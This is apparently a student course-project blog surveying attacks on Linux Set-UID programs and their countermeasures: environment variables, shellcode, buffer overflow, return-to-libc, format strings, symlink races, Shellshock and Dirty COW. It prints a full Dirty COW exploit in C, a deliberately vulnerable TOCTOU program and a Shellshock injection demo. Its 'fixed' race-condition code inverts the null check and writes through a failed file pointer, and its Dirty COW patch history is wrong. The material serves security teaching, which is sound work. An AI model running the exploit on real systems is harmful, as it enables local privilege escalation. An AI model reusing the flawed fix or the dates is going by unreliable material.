Software Security - Overview

Writer infomation

This blog is a report for Infomation Security course's project, written by:

Nguyễn Nhật Minh Khôi - Student ID: 19120020 - Ho Chi Minh University of Science
Vũ Hữu Nghĩa - Student ID: 19120028 - Ho Chi Minh University of Science
Bạch Ngọc Minh Tâm - Student ID: 19120034 - Ho Chi Minh University of Science
Đỗ Nguyễn Duy Hoàng - Student ID: 19120077 - Ho Chi Minh University of Science

Introduction

Software security is a broad field including all vulnerability related to software. There are common problems such as SQL Injection, OS command injection, buffer overflow, etc. Consequently, cover all of those topic in only one article is impossible, here we only focus on one main object that often cause problem for our system, it is Set-UID program. We will learn how it can be exploited like buffer overflow, race condition, format string, shellshock, etc. as well as how to counter against these attacks.

Note that this blog provide just an overview of each attack, it means that we will just discuss things at concept level. However, we also provide a detail article for each technique so you can deep dive into it as you need.

You can also find all demo videos here.

Set UID Program

So what is set-uid program?

Thing starts with a question: "How do normal users change their password?". Here we got a problem: changing passwords requires changing the password file in the OS, but this file is not modificable by normal user. We cannot give normal user write permission to password file since they can affect other user's password. We also cannot give normal user write permission in specific line since the best fine-grained permission in most OSes is only at file level, increasing the granularity of the access control can certainly solve this problem, but it will significantly increase the complexity of the operating systems.

For solving such problems, most operating systems choose a simplistic two-tier design. At the lower tier, they implement a simple and generic access control model at file level. Many more complex application-dependent access control will be implemented at higher tier in a form of privileged program.

Set-uid program is one kind of privileged program. The idea is that instead of give user a privileged permission and let them do things manually, we programme a program which automatically do task with priviledged permission but still can be executed by normal user. In linux, set-uid program is implemented by seperate effective user ID and real user ID of the process. The real user ID specify ID of user running the process, when the effective user specify the ID used in access control, i.e. what privilege a process has. At normal program, the real user ID and effective user ID are the same. However, when a program is marked as set-uid (by turn on set-uid bit through chmod command) are executed, the effective user ID in this case is depend on the user that own the program, not the ID of the user execute the program (the real user ID).

For example, if I have a program name prog, I will run these two command to make prog a root set-uid program:

$ sudo chown root prog # change the owner of the program to root
$ sudo chmod 4755 prog # 4 here turn on setuid bit for the program

Where the attack happen?

In principle, the set-uid mechanism is secure. However, the vulnerability here lie in a implementation of programmer. Without carefully logic, malicious user can make the program go wrong and do harm to our system. Basically, there are two surfaces where the attack happen, one is input of the set-uid program containing user input, system input that can be controlled by user and environment variablem, the other is the non-privileged program where set-uid program leak capability.

Environment variable

For more detailed explanation about environment variable attack, please go to this link.

What is environment variable

Environment variables are set of dynamic name-value pairs stored inside a process, they affect a process's behaviour. For example, when a process is executed by a shell process, it uses an environment variable named PATH to find where a program is (if the full path of the program is not specified).

But where do a process get its environment variable? The answers is a process initially get its environment variables through one of two way:

If a process is a new one (fork in C), the child's process inherits all environment variables of parent process since its memory is duplicated from parent's memory.
If a process run a new program itself (execve in C), it overwirtes all of its current memory, this leads to all of its previous environment variables is lost, unless it passes its environment when invoking new process.

How do the attack happen?

In an attack, environment variable is usually used as input of a set-uid program. What makes environment variables danger is that in most of the time, the developers of the program are not aware of the usage of its. This leads to the leak of sanitizing these inputs, which may affect the behavior of a program.

We can categorize the attack surface of environment variables into

2

main categories:

Linker: A linker is used to find the external library functions used by a program. In most operating systems the linker use environment variables to find where the libraries are. By that, malicious user can make use of this and cause a priviledged program to "find" their malicious libraries first instead of the developer's intended library.
Application: in this surfaces, problem comes from the implementation of application. Those applications are divided into
$3$ type: library, external program and application itself.
- Library: some external libraries can contain library vulnerability since they are not developed for privileged programs, and therefore may not sanitize the values of environment variables well. This can leads to attack in the environment variables that these external functions using.
- External program: When a program invoke external programs for certain functionalities, such as sending emails, processing data, etc, its code runs with the calling process's privilege. The external program may use some environment variables that are not used by the caller program and therefore expanded the attack surface.
- Application code: when a program use environment variables itself, misunderstanding how the variables get into program may cause to incorrect sanitization of it.

Countermeasures

To reduce the vulnerability of environment variables, we have some solution:

Carefull use environment: Never trust the content of environment variables, neither explicit nor implicitm, always remove or sanitize them before use in a privileged program.
Use service approach: different from set-uid approach, in the service approach, normal users have to request a privileged service to conduct

Shellcode

Detailed explanation, as well as experiments and demostrations can be found here

What is shellcode ?

Shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine.

One of the most application of Shellcode is buffer overflows, which can exploit various security holes in an application.

How to write a shellcode

So far, the shellcode used in exploiting has been just a string of copied and pasted bytes. Shellcode bytes are actually architecture-specific machine instruction, so shellcode is written using the assembly language.

However, the most difficult challenge of writing a good shellcode is that there are no null bytes in the shellcode, since shellcode will be often injected into a process as a string, using function like strcpy(). The null bytes come from:

Zero value (0)
End of the string ('\0')
NULL value of a pointer
High bytes of the small positive integer (ex.0x00000069)

To obtain the zero value, we can use xor command, which is most commonly use in shell code. And to obtain the small positive 32-bit integer, we can choose one of the following ways:

Assign a register to a 32-bit integer, which there is no null bytes (ex. 0x69123456), then shift the register left (shl) or right (shr) in a reasonable way.
Obtain the zero value, then adjust its high bytes (ah, bh, ch, dh) or its low bytes (al, bl, cl, dl)

Buffer Overflow

Detailed explanation, as well as experiments and demostrations can be found here.

What is buffer overflow (BOF)?

In a nutshell, buffer overflow happens when a large buffer's content is transferred to a smaller buffer which can not fit the content it its entirety, resulting in a part of said content being in uncontrolled memory addresses. The main objective of BOF exploitation is to gain control over a function's return address RA, directly altering the flow of the program, which then can run malicious code injected by the attacker or running a list of system-defined functions (see return-to-libc), both of which can give the attacker control over the host machine.

How it works

A program's memory consists of 3 parts: code/data segment, heap and stack. The stack is where statically allocated local variables, function arguments, return addresses… are stored. Local variables, specifically, are primitively typed variables (int, double,…) statically allocated null-terminated strings (char*) and arrays (int a[5], double b[6]…). Buffer overflow, which mainly happens on programs written in C/C++, is due to the fact that the arrays/strings in C are not actually bounded by the initial number of elements specified (with the pointer of the array/string, one can access anywhere in the stack after the pointer, ex.int a[5]={0}; printf("%d", a[6]); is valid), and its memory-related functions (scanf, strcpy, strcmp…) cannot determine whether the original buffer size can fit the target buffer. If the original buffer is long enough, the attacker can use such a vulnerability to alter the memory in the stack, especially the return address, which lies before the frame pointer, to gain total control of the program flow.

Countermeasures

Address Space Layout Randomization (ASLR) is a mechanism which randomizes address space of a program each time it runs. This can be brute-forced given enough time in a 32-bit program (and takes too much time to be worth doing in a 64-bit program).
StackGuard is a mechanism first introduced in the 2.x version of GCC. While flawed, it can prevent BOF from happening given the right circumstances. Later implementations have seeked to resolve the flaws that the original StackGuard had. However it is not default even in current versions of GCC/G++.
Non-executable Stack Protection locks the stack from being executed by the program. This locks the possibility of running code injected by the attacker, but since it cannot prevent the vulnerability from happening altogether, there are many ways to bypass this countermeasure. One of them is return-to-libc.

Return to libc

For more detailed explanation about return-to-libc attack, please go to this link.

The vulnerability in built-in library

In the previous section, we have seen that by using buffer overflow attack, attacker cause a program to jump to shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable; therefore, jumping to the shellcode will cause the program to fail.

Unfortunately, the above protection scheme is not fool-proof. There exists another type of attacks, the return-to-libc attack, which does not need an executable stack; it does not even use shell code. Instead, it causes the vulnerable program to jump to some existing code, such as the system() function in the libc library, which is already loaded into the memory.

How the attack happen?

There is a region in the memory where plenty of code can be found. It is the region for the standard C library functions. In Linux, the library is called libc, which is a dynamic link library. Most programs use the functions inside the libc library, so before these programs start running, the operating system will load the libc library into memory.

So which function in libc can help attacker achieve their malicious goal? Several such functions exist inside libc, the easiest one to use is system() function. system() function simply invoke a new shell and executes the string argument it is passed by that shell. At this time, we just need to pass the string "/bin/sh" to system() and it will spawn new privileged shell since our parent process is an set-uid program. Besides the system() function, there exists a lot of difference function that can do harm to our system, such as execv() function, setuid() function, etc.

However, the implementation of this attack is not as easy as its idea. First we needs to know position of the return address (often called

R A

) with our buffer for overloading it. In C, we can easily do this by debug a program and print out the address of ebp pointer and of buffer. Next, we need to have deep knowledge about how our stack and pointer change when a function is called (function prologue) or return (function epilogue) for knowing exactly where to inject an argument of our malicious function (in our case it is the first argument "/bin/sh" of system()). The last thing to do is finding out the address of the argument, for example we can do it by using the export command of shell to export new environment variable contain our desired value (in out case it is "/bin/sh").

Countermeasures

Just like our previous injected-shellcode version of buffer overflow attack, there are some counter measure for return-to-libc attack:

Address Space Layout Randomization (ASLR) and StackGuard are mentioned in previous section.
"ASCII armoring" is a technique that can be used to obstruct this kind of attack. With ASCII armoring, all the system libraries (e.g., libc) addresses contain a NULL byte (0x00). This is commonly done by placing them in the first 0x01010101 bytes of memory (a few pages more than
$16$ MB, dubbed the "ASCII armor region"), as every address up to (but not including) this value contains at least one NULL byte. This makes it impossible to emplace code containing those addresses using string manipulation functions such as strcpy().

Format string

Detailed explanation, as well as experiments and demostrations, can be found here.

What is Format String Attack?

The format string attack is an exploit which one can gain information from the program's memory, altering memory or even running malicious code due to reckless usage of uncontrolled format strings in the printf function family.

How it works

A format string is a template for program output, consisting of format specifiers acting as placeholders, which tells the program how to interpret and print the requested data. For example, I am %d years old is a format string, containing the format specifier %d which tells the program to interpret the next 4 bytes of the memory as a signed integer int. This integer will then be parsed into a string and output.

The printf function has a format string as its first argument, all arguments after are the data requested by the programmer for the program to interpret and print. If a pointer to a non-literal null-terminated string is passed as the first argument into printf, it will also interpret said string as a format string. In the string, the function goes through every character and output it if it is not a format specifer. When the function meets a format specifer, the argument pointer, initially pointed to the format string, will go to the address of the next argument. This works even if no further arguments are passed in the function, or if there are fewer arguments than there are format specifers, resulting in the function reading uncontrolled addresses and interpretting them as real allocated memory.

This is problematic, since besides the fact that the attacker can read the memory in the stack that they are not supposed to know (which can contain sensitive data), there are format specifiers which write to the memory instead of reading from the memory, giving the attacker the power of controlling the return address of a function, which, as we know, gives the attacker total control of the program flow.

Countermeasures

While the countermeasures mentioned in BOF can also protect the program from a format string attack to an extent, the best way to not get exploited by the vulnerability is to always hard-code the format string like this

printf("%s",s);

instead of this

printf(s);

especially when one wants to print a string variable.

Race condition

Detailed explanation, as well as experiments and demostrations can be found here.

What is Race condition?

A race condition occurs when two or more threads can access shared data and they try to change it at the same time. Because the thread scheduling algorithm can swap between threads at any time, you don't know the order in which the threads will attempt to access the shared data. Therefore, the result of the change in data is dependent on the thread scheduling algorithm, i.e. both threads are "racing" to access/change the data.

What is symlink race?

A symlink race is a kind of software security vulnerability based on race conditions that result from a program creating files in an insecure manner. A malicious user can create a symbolic link to a file not otherwise accessible to them. When the privileged program creates a file of the same name as the symbolic link, it makes the linked-to file instead, possibly inserting content desired by the malicious user or even provided by the malicious user (as input to the program).

How it works?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main()
{
    char* fn = "/tmp/XYZ";
    char buffer[60];
    FILE* fp;

    /* get user input */
    scanf("%50s", buffer);

    if (!access(fn, W_OK)) {
        // vulnerability moment
        fp = fopen(fn, "a+");
        if (!fp) {
            perror("Open failed");
            exit(1);
        }
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    } else {
        printf("No permission \n");
    }

    return 0;
}

The file name “/tmp/XYZ” has been hardcoded in program, but you can use symbolic links to change the meaning of this name.
After check access permission by function access(fn,W_OK), you can chage the symbolic links of “/tmp/XYZ” to another file.
Because we have bypassed condition, function fopen will open any file without permission.
Because it must change symbolic link on time after condition and before fopen, it’s called race (with) condition

Countermeasure

Applying the Principle of Least Privilege
If users do not need certain privilege, the privilege needs to be disabled
We can reduce the privilege by using seteuid and check permission direct by the file pointer return from fopen

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main()
{
    char* fn = "/tmp/XYZ";
    char buffer[60];
    FILE* fp;
    uid_t real_uid = getuid();
    uid_t eff_uid = geteuid();
    /* get user input */
    scanf("%50s", buffer);
    seteuid(real_uid); // Set UID thực sự của người dùng để giới hạn quyền root
    fp = fopen(fn, "a+");
    if (!fp) { // Kiểm tra trực tiếp con trỏ file được mở không thông qua hàm access
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    } else {
        printf("No permission \n");
    }
    seteuid(eff_uid); // Trả UID về mặc định ban đầu.
    return 0;
}

Dirty COW

Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affected all Linux-based operating systems, including Android devices, that used older versions of the Linux kernel created before 2018.
It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. Computers and devices that still use the older kernels remain vulnerable.

This is the sample eploit code:

#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/stat.h>
#include <string.h>
void *map;
void *writeThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char *argv[])
{
  pthread_t pth1,pth2;
  struct stat st;
  int file_size;

  // Open the target file in the read-only mode.
  int f=open("/zzz", O_RDONLY);

  // Map the file to COW memory using MAP_PRIVATE.
  fstat(f, &st);
  file_size = st.st_size;
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);
  // Find the position of the target area
  char *position = strstr(map, "222222");                        
  // We have to do the attack using two threads.
  pthread_create(&pth1, NULL, madviseThread, (void  *)file_size); 
  pthread_create(&pth2, NULL, writeThread, position);             
  // Wait for the threads to finish.
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}
void *writeThread(void *arg)
{
  char *content= "******";
  off_t offset = (off_t) arg;

  int f=open("/proc/self/mem", O_RDWR);
  while(1) {
    // Move the file pointer to the corresponding position.
    lseek(f, offset, SEEK_SET);
    // Write to the memory.
    write(f, content, strlen(content));
  }
}
void *madviseThread(void *arg)
{
  int file_size = (int) arg;
  while(1){
      madvise(map, file_size, MADV_DONTNEED);
  }
}

On November 27, 2017, the revised patch was released, before public dissemination of the vulnerability.

Shellshock

Detailed explanation, as well as experiments and demostrations can be found here

What is Shellshock?

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

The bug has been existing in a C file in bash source code.

Shellshock bug

The Shellshock bug starts in the variable.c file in the bash source code. The characters () { defined in the shell variable make the command be parsed, but it has a mistake. This is the code in variable.c

/* Initialize the shell variables from the current environment.
   If PRIVMODE is nonzero, don't import functions from ENV or
   parse $SHELLOPTS. */
void initialize_shell_variables (env, privmode)
     char **env;
     int privmode;
{
  [...]
  for (string_index = 0; string = env[string_index++]; )
    {

      [...]
      /* If exported function, define it now.  Don't import functions from
     the environment in privileged mode. */
      if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
      {
        [...]
        parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
        [...]
      }
}

A for loop will loop through all environment variables, then check if there is an exported function (an environment variables starts with "() {"), bash will remove '='. Then the parse_and_execute() will be executed to parse the function definition. Source code for this function can be found here. However, not only the function can parse the function definitions, but also the shell commands:

If the string contains only function definition, the parsing function will parse it.
If the string contains function definition and shell command, the parsing function will execute it
If the string contains multiple commands, seperated by ;, the parsing function will execute them

$ foo=' () { echo "Hello world" ; }; echo "extra";'
$ export foo 
$ bash 
extra    # the second command is executed

(child) $ declare -f foo
foo()
{
    echo : "Hello world"
}

Thus, the idea for Shellshock attack is: If we have a function definition, if we can add some extra command (given by the attacker), then pass this function via environment variable to bash, due to the mistake in parse_and_execute(), we can force the target to run the commands.

The condition for exploiting Shellshock vulnerability in bash:

The target should run bash .
The targer should get some environment variable from outside (attacker of illegal source).

Countermeasure

Update for the latest bash
Use an IDS/IPS to detect for any type of network communication: It will notify you when a connection is established and remote commands are executed.
Use a web application firewall to monitor the vulnerability in the header. (a signature will be added to the POST/GET field): CGI’s (Common Gateway Interface) and CGI scripts are the most affected to the exploiting ability of the bug from a web application by code that passes through the Bash. This signature will monitor for attempts to bypass the detection signature via multiple whitespace using(){ command

Conclusion

In the end, the set-uid mechanism itself is secure, what made the software go wrong is our misunderstanding when using it. Therefore, programmer must always careful when implement set-uid program and user must update the program to newest version for the fix of security bug in it.

Software Security - Overview

Writer infomation

Introduction

Set UID Program

So what is set-uid program?

Where the attack happen?

Environment variable

What is environment variable

How do the attack happen?

Countermeasures

Shellcode

What is shellcode ?

How to write a shellcode

Buffer Overflow

What is buffer overflow (BOF)?

How it works

Countermeasures

Return to libc

The vulnerability in built-in library

How the attack happen?

Countermeasures

Format string

What is Format String Attack?

How it works

Countermeasures

Race condition

What is Race condition?

What is symlink race?

How it works?

Countermeasure

Dirty COW

Shellshock

What is Shellshock?

Countermeasure

Conclusion

Read more

Z-function